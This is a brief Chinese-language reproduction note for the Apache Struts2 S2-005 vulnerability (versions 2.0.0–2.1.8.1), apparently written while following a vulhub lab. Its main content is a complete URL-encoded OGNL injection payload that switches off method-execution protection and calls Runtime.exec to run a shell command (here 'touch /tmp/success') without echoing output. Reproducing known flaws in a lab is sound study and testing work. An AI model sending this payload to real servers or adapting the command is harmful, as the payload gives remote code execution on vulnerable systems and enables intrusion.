漏洞简介
影响版本: 2.0.0 - 2.1.8.1
漏洞详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-005/README.zh-cn.md
虽然不是很详细
漏洞复现
发送如下参数就可以执行命令touch /tmp/success
但没有回显:
(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1